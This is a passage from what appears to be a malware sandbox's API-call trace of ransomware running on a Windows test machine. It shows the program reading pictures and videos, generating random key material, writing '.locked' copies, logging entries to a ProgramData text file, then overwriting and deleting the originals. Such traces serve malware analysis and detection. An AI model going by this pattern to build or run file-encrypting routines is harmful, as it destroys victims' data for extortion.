dwMilliseconds=0xffffffff) returned 0x0 [0314.941] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0x1) returned 0x0 [0314.944] SetEvent (hEvent=0x190) returned 1 [0314.944] SetEvent (hEvent=0x12c) returned 1 [0314.944] SetEvent (hEvent=0x214) returned 1 [0314.944] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0314.945] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33e2fb34, ulCount=0x10, ulNumEntriesRemoved=0x33e2fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33e2fb34, ulNumEntriesRemoved=0x33e2fb14) returned 0 [0314.946] SetEvent (hEvent=0x214) returned 1 [0314.946] SetEvent (hEvent=0x12c) returned 1 [0314.946] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\KpKdn6T4M.bmp" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\kpkdn6t4m.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x218 [0314.946] GetConsoleMode (in: hConsoleHandle=0x218, lpMode=0x125e1d9c | out: lpMode=0x125e1d9c) returned 0 [0314.946] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\KpKdn6T4M.bmp.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\kpkdn6t4m.bmp.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0314.947] GetConsoleMode (in: hConsoleHandle=0x19c, lpMode=0x125e1d9c | out: lpMode=0x125e1d9c) returned 0 [0314.947] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x125fc000 | out: pbBuffer=0x125fc000) returned 1 [0314.947] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x12392020 | out: pbBuffer=0x12392020) returned 1 [0314.947] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12340581 | out: pbBuffer=0x12340581) returned 1 [0314.947] WriteFile (in: hFile=0x19c, lpBuffer=0x126c7000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x125e1d78, lpOverlapped=0x0 | out: lpBuffer=0x126c7000*, lpNumberOfBytesWritten=0x125e1d78*=0x80, lpOverlapped=0x0) returned 1 [0314.964] ReadFile (in: hFile=0x218, lpBuffer=0x12ba2000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x125e1d68, lpOverlapped=0x0 | out: lpBuffer=0x12ba2000*, lpNumberOfBytesRead=0x125e1d68*=0x18d92, lpOverlapped=0x0) returned 1 [0314.969] WriteFile (in: hFile=0x19c, lpBuffer=0x12ba2000*, nNumberOfBytesToWrite=0x18d92, lpNumberOfBytesWritten=0x125e1d74, lpOverlapped=0x0 | out: lpBuffer=0x12ba2000*, lpNumberOfBytesWritten=0x125e1d74*=0x18d92, lpOverlapped=0x0) returned 1 [0314.973] ReadFile (in: hFile=0x218, lpBuffer=0x12ba2000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x125e1d68, lpOverlapped=0x0 | out: lpBuffer=0x12ba2000*, lpNumberOfBytesRead=0x125e1d68*=0x0, lpOverlapped=0x0) returned 1 [0314.974] CloseHandle (hObject=0x19c) returned 1 [0314.974] CloseHandle (hObject=0x218) returned 1 [0314.974] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x218 [0314.975] GetConsoleMode (in: hConsoleHandle=0x218, lpMode=0x125e1e94 | out: lpMode=0x125e1e94) returned 0 [0314.975] WriteFile (in: hFile=0x218, lpBuffer=0x12670200*, nNumberOfBytesToWrite=0x3d, lpNumberOfBytesWritten=0x125e1e64, lpOverlapped=0x0 | out: lpBuffer=0x12670200*, lpNumberOfBytesWritten=0x125e1e64*=0x3d, lpOverlapped=0x0) returned 1 [0314.975] CloseHandle (hObject=0x218) returned 1 [0314.975] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\KpKdn6T4M.bmp" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\kpkdn6t4m.bmp")) returned 1 [0315.016] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0x1) returned 0x0 [0315.017] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33e2fb30, ulCount=0x10, ulNumEntriesRemoved=0x33e2fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33e2fb30, ulNumEntriesRemoved=0x33e2fb10) returned 0 [0315.017] SetEvent (hEvent=0x150) returned 1 [0315.017] SetEvent (hEvent=0x214) returned 1 [0315.017] SetEvent (hEvent=0x14c) returned 1 [0315.017] SetEvent (hEvent=0x12c) returned 1 [0315.042] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\KpKdn6T4M.bmp" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\kpkdn6t4m.bmp"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x200 [0315.058] GetConsoleMode (in: hConsoleHandle=0x200, lpMode=0x125e1e88 | out: lpMode=0x125e1e88) returned 0 [0315.058] WriteFile (in: hFile=0x200, lpBuffer=0x17ef8000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x125e1e78, lpOverlapped=0x0 | out: lpBuffer=0x17ef8000*, lpNumberOfBytesWritten=0x125e1e78*=0xfa000, lpOverlapped=0x0) returned 1 [0315.077] CloseHandle (hObject=0x200) returned 1 [0315.078] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\KpKdn6T4M.bmp" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\kpkdn6t4m.bmp")) returned 1 [0315.083] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1263e000*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x125e1a24, lpReserved=0x0 | out: lpBuffer=0x1263e000*, lpNumberOfCharsWritten=0x125e1a24*=0xc) returned 1 [0315.095] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\fz05L0c.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\fz05l0c.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x218 [0315.096] GetConsoleMode (in: hConsoleHandle=0x218, lpMode=0x125e1d9c | out: lpMode=0x125e1d9c) returned 0 [0315.096] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\fz05L0c.gif.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\fz05l0c.gif.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0315.096] GetConsoleMode (in: hConsoleHandle=0x19c, lpMode=0x125e1d9c | out: lpMode=0x125e1d9c) returned 0 [0315.097] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1263e020 | out: pbBuffer=0x1263e020) returned 1 [0315.097] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x124a8070 | out: pbBuffer=0x124a8070) returned 1 [0315.097] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1237c181 | out: pbBuffer=0x1237c181) returned 1 [0315.097] WriteFile (in: hFile=0x19c, lpBuffer=0x12719000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x125e1d78, lpOverlapped=0x0 | out: lpBuffer=0x12719000*, lpNumberOfBytesWritten=0x125e1d78*=0x80, lpOverlapped=0x0) returned 1 [0315.101] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33e2fb30, ulCount=0x10, ulNumEntriesRemoved=0x33e2fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33e2fb30, ulNumEntriesRemoved=0x33e2fb10) returned 0 [0315.101] SetEvent (hEvent=0x184) returned 1 [0315.101] SetEvent (hEvent=0x190) returned 1 [0315.101] SetEvent (hEvent=0x12c) returned 1 [0315.101] ReadFile (in: hFile=0x218, lpBuffer=0x13912000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x125e1d68, lpOverlapped=0x0 | out: lpBuffer=0x13912000*, lpNumberOfBytesRead=0x125e1d68*=0x618a, lpOverlapped=0x0) returned 1 [0315.104] WriteFile (in: hFile=0x19c, lpBuffer=0x13912000*, nNumberOfBytesToWrite=0x618a, lpNumberOfBytesWritten=0x125e1d74, lpOverlapped=0x0 | out: lpBuffer=0x13912000*, lpNumberOfBytesWritten=0x125e1d74*=0x618a, lpOverlapped=0x0) returned 1 [0315.123] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0315.215] ReadFile (in: hFile=0x218, lpBuffer=0x13912000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x125e1d68, lpOverlapped=0x0 | out: lpBuffer=0x13912000*, lpNumberOfBytesRead=0x125e1d68*=0x0, lpOverlapped=0x0) returned 1 [0315.216] CloseHandle (hObject=0x19c) returned 1 [0315.216] CloseHandle (hObject=0x218) returned 1 [0315.216] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x218 [0315.216] GetConsoleMode (in: hConsoleHandle=0x218, lpMode=0x125e1e94 | out: lpMode=0x125e1e94) returned 0 [0315.216] WriteFile (in: hFile=0x218, lpBuffer=0x1239a090*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x125e1e64, lpOverlapped=0x0 | out: lpBuffer=0x1239a090*, lpNumberOfBytesWritten=0x125e1e64*=0x30, lpOverlapped=0x0) returned 1 [0315.216] CloseHandle (hObject=0x218) returned 1 [0315.217] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\fz05L0c.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\fz05l0c.gif")) returned 1 [0315.349] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0315.365] SetEvent (hEvent=0x20c) returned 1 [0315.365] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0315.370] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0315.412] SetEvent (hEvent=0x1f0) returned 1 [0315.412] SetEvent (hEvent=0x220) returned 1 [0315.412] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0315.413] SetEvent (hEvent=0x1f0) returned 1 [0315.413] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0315.420] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1263e000*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x125e1a24, lpReserved=0x0 | out: lpBuffer=0x1263e000*, lpNumberOfCharsWritten=0x125e1a24*=0xc) returned 1 [0315.425] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\wW1ws0e\\D5is0-m1xKE.png" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\ww1ws0e\\d5is0-m1xke.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c0 [0315.425] GetConsoleMode (in: hConsoleHandle=0x1c0, lpMode=0x125e1d9c | out: lpMode=0x125e1d9c) returned 0 [0315.425] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\wW1ws0e\\D5is0-m1xKE.png.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\ww1ws0e\\d5is0-m1xke.png.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e0 [0315.426] GetConsoleMode (in: hConsoleHandle=0x1e0, lpMode=0x125e1d9c | out: lpMode=0x125e1d9c) returned 0 [0315.426] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1263e020 | out: pbBuffer=0x1263e020) returned 1 [0315.426] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x12766050 | out: pbBuffer=0x12766050) returned 1 [0315.426] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12340581 | out: pbBuffer=0x12340581) returned 1 [0315.426] WriteFile (in: hFile=0x1e0, lpBuffer=0x12669000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x125e1d78, lpOverlapped=0x0 | out: lpBuffer=0x12669000*, lpNumberOfBytesWritten=0x125e1d78*=0x80, lpOverlapped=0x0) returned 1 [0315.429] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0x1) returned 0x0 [0315.434] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33e2fb30, ulCount=0x10, ulNumEntriesRemoved=0x33e2fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33e2fb30, ulNumEntriesRemoved=0x33e2fb10) returned 0 [0315.434] SetEvent (hEvent=0x150) returned 1 [0315.434] SetEvent (hEvent=0x214) returned 1 [0315.434] SetEvent (hEvent=0x220) returned 1 [0315.434] SetEvent (hEvent=0x20c) returned 1 [0315.434] ReadFile (in: hFile=0x1c0, lpBuffer=0x1705c000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x125e1d68, lpOverlapped=0x0 | out: lpBuffer=0x1705c000*, lpNumberOfBytesRead=0x125e1d68*=0x10aad, lpOverlapped=0x0) returned 1 [0315.436] WriteFile (in: hFile=0x1e0, lpBuffer=0x1705c000*, nNumberOfBytesToWrite=0x10aad, lpNumberOfBytesWritten=0x125e1d74, lpOverlapped=0x0 | out: lpBuffer=0x1705c000*, lpNumberOfBytesWritten=0x125e1d74*=0x10aad, lpOverlapped=0x0) returned 1 [0315.439] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0315.599] ReadFile (in: hFile=0x1c0, lpBuffer=0x1705c000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x125e1d68, lpOverlapped=0x0 | out: lpBuffer=0x1705c000*, lpNumberOfBytesRead=0x125e1d68*=0x0, lpOverlapped=0x0) returned 1 [0315.599] CloseHandle (hObject=0x1e0) returned 1 [0315.600] CloseHandle (hObject=0x1c0) returned 1 [0315.600] SetEvent (hEvent=0x190) returned 1 [0315.600] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0315.602] SetEvent (hEvent=0x1f0) returned 1 [0315.602] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0315.603] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1234c2a0*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x125e3a24, lpReserved=0x0 | out: lpBuffer=0x1234c2a0*, lpNumberOfCharsWritten=0x125e3a24*=0xc) returned 1 [0315.606] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\Xhgh4LkdSysSXjg.png" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\xhgh4lkdsyssxjg.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c0 [0315.606] GetConsoleMode (in: hConsoleHandle=0x1c0, lpMode=0x125e3d9c | out: lpMode=0x125e3d9c) returned 0 [0315.606] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\Xhgh4LkdSysSXjg.png.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\xhgh4lkdsyssxjg.png.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e0 [0315.611] GetConsoleMode (in: hConsoleHandle=0x1e0, lpMode=0x125e3d9c | out: lpMode=0x125e3d9c) returned 0 [0315.611] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1234c2c0 | out: pbBuffer=0x1234c2c0) returned 1 [0315.611] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x124a8030 | out: pbBuffer=0x124a8030) returned 1 [0315.611] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1237c201 | out: pbBuffer=0x1237c201) returned 1 [0315.612] WriteFile (in: hFile=0x1e0, lpBuffer=0x126f5000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x125e3d78, lpOverlapped=0x0 | out: lpBuffer=0x126f5000*, lpNumberOfBytesWritten=0x125e3d78*=0x80, lpOverlapped=0x0) returned 1 [0315.615] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0x1) returned 0x0 [0315.617] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33e2fb30, ulCount=0x10, ulNumEntriesRemoved=0x33e2fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33e2fb30, ulNumEntriesRemoved=0x33e2fb10) returned 0 [0315.617] SetEvent (hEvent=0x150) returned 1 [0315.617] SetEvent (hEvent=0x1f0) returned 1 [0315.617] SetEvent (hEvent=0x22c) returned 1 [0315.617] SetEvent (hEvent=0x220) returned 1 [0315.617] ReadFile (in: hFile=0x1c0, lpBuffer=0x12ba2000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x125e3d68, lpOverlapped=0x0 | out: lpBuffer=0x12ba2000*, lpNumberOfBytesRead=0x125e3d68*=0xd47, lpOverlapped=0x0) returned 1 [0315.619] WriteFile (in: hFile=0x1e0, lpBuffer=0x126f5000*, nNumberOfBytesToWrite=0xd47, lpNumberOfBytesWritten=0x125e3d78, lpOverlapped=0x0 | out: lpBuffer=0x126f5000*, lpNumberOfBytesWritten=0x125e3d78*=0xd47, lpOverlapped=0x0) returned 1 [0315.639] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0315.684] SetEvent (hEvent=0x150) returned 1 [0315.684] SetEvent (hEvent=0x1f0) returned 1 [0315.684] ReadFile (in: hFile=0x1c0, lpBuffer=0x12ba2000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x125e3d68, lpOverlapped=0x0 | out: lpBuffer=0x12ba2000*, lpNumberOfBytesRead=0x125e3d68*=0x0, lpOverlapped=0x0) returned 1 [0315.684] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0315.725] SetEvent (hEvent=0x150) returned 1 [0315.725] SetEvent (hEvent=0x22c) returned 1 [0315.725] CloseHandle (hObject=0x1e0) returned 1 [0315.726] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0315.797] CloseHandle (hObject=0x1c0) returned 1 [0315.797] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c0 [0315.799] GetConsoleMode (in: hConsoleHandle=0x1c0, lpMode=0x125e3e94 | out: lpMode=0x125e3e94) returned 0 [0315.799] WriteFile (in: hFile=0x1c0, lpBuffer=0x126d20c0*, nNumberOfBytesToWrite=0x56, lpNumberOfBytesWritten=0x125e3e64, lpOverlapped=0x0 | out: lpBuffer=0x126d20c0*, lpNumberOfBytesWritten=0x125e3e64*=0x56, lpOverlapped=0x0) returned 1 [0315.857] CloseHandle (hObject=0x1c0) returned 1 [0315.858] SetEvent (hEvent=0x198) returned 1 [0315.858] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0x1) returned 0x102 [0315.867] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0315.867] SetEvent (hEvent=0x184) returned 1 [0315.867] SetEvent (hEvent=0x214) returned 1 [0315.867] SetEvent (hEvent=0x134) returned 1 [0315.867] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0315.875] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33e2fb34, ulCount=0x10, ulNumEntriesRemoved=0x33e2fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33e2fb34, ulNumEntriesRemoved=0x33e2fb14) returned 0 [0315.875] SetEvent (hEvent=0x150) returned 1 [0315.875] SetEvent (hEvent=0x134) returned 1 [0315.875] SetEvent (hEvent=0x214) returned 1 [0315.875] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\Xhgh4LkdSysSXjg.png" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\xhgh4lkdsyssxjg.png")) returned 1 [0315.940] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0315.950] SetEvent (hEvent=0x214) returned 1 [0315.950] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0315.952] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0316.029] SetEvent (hEvent=0x134) returned 1 [0316.029] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0316.034] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0316.064] SetEvent (hEvent=0x134) returned 1 [0316.064] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0316.124] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\uf6wQ63liri5t-.png" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\uf6wq63liri5t-.png")) returned 1 [0316.344] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0316.524] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0316.549] SetEvent (hEvent=0x220) returned 1 [0316.555] SetEvent (hEvent=0x1ac) returned 1 [0316.555] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0316.566] SetEvent (hEvent=0x220) returned 1 [0316.566] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0316.569] SetEvent (hEvent=0x220) returned 1 [0316.620] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0x1) returned 0x102 [0316.626] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0316.626] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33e2fb30, ulCount=0x10, ulNumEntriesRemoved=0x33e2fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33e2fb30, ulNumEntriesRemoved=0x33e2fb10) returned 0 [0316.627] SetEvent (hEvent=0x150) returned 1 [0316.627] SetEvent (hEvent=0x220) returned 1 [0316.627] SetEvent (hEvent=0x22c) returned 1 [0316.627] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\wW1ws0e\\di-h-v4MS65pv.png" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\ww1ws0e\\di-h-v4ms65pv.png"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x224 [0316.635] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0316.646] SetEvent (hEvent=0x220) returned 1 [0316.646] GetConsoleMode (in: hConsoleHandle=0x224, lpMode=0x125d9e88 | out: lpMode=0x125d9e88) returned 0 [0316.646] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0316.809] SetEvent (hEvent=0x134) returned 1 [0316.809] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0316.816] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0316.950] SetEvent (hEvent=0x14c) returned 1 [0316.950] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0317.387] SetEvent (hEvent=0x12c) returned 1 [0317.387] SetEvent (hEvent=0x1ac) returned 1 [0317.387] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0317.393] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0317.398] SetEvent (hEvent=0x20c) returned 1 [0317.398] SetEvent (hEvent=0x214) returned 1 [0317.398] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0317.440] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x125fc040*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x1265ba24, lpReserved=0x0 | out: lpBuffer=0x125fc040*, lpNumberOfCharsWritten=0x1265ba24*=0xc) returned 1 [0317.502] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0317.544] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0317.550] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0317.552] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x125fc000*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x12489a24, lpReserved=0x0 | out: lpBuffer=0x125fc000*, lpNumberOfCharsWritten=0x12489a24*=0xc) returned 1 [0317.557] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\UQ6zmB-l2xOZ\\63hREK4u.avi" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\uq6zmb-l2xoz\\63hrek4u.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0317.557] GetConsoleMode (in: hConsoleHandle=0x1bc, lpMode=0x12489d9c | out: lpMode=0x12489d9c) returned 0 [0317.557] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\UQ6zmB-l2xOZ\\63hREK4u.avi.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\uq6zmb-l2xoz\\63hrek4u.avi.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x224 [0317.596] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0317.616] GetConsoleMode (in: hConsoleHandle=0x224, lpMode=0x12489d9c | out: lpMode=0x12489d9c) returned 0 [0317.616] SetEvent (hEvent=0x220) returned 1 [0317.617] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0317.619] SetEvent (hEvent=0x190) returned 1 [0317.619] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0317.645] SetEvent (hEvent=0x14c) returned 1 [0317.645] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0317.657] SetEvent (hEvent=0x20c) returned 1 [0317.657] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0x1) returned 0x102 [0317.720] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 